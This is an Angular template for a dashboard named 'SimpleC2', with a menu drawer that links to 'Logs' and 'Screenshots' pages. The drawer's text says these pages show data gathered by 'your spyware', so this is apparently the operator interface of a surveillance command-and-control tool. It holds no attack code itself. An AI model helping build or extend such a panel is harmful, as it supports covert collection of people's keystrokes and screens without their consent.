<p-panel header="SimpleC2">
  <p-button (onClick)="visible.set(true)">
      <ng-template #icon>
          <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" class="size-6">
              <path stroke-linecap="round" stroke-linejoin="round" d="M3.75 6.75h16.5M3.75 12h16.5m-16.5 5.25h16.5" />
            </svg>              
      </ng-template>
  </p-button>
</p-panel>

<p-drawer [(visible)]="visible" header="Menu">
  <p>
    This menu shows the data you can see from your spyware. For now, you can see
    the text data and screenshots.
  </p>
  <p-divider/>
  <div class="flex flex-col gap-5">
    <button pButton routerLink="/text-logs" label="Logs" size="large"></button>
    <button pButton routerLink="/screenshots" label="Screenshots" size="large"></button>
  </div>
</p-drawer>

<router-outlet/>
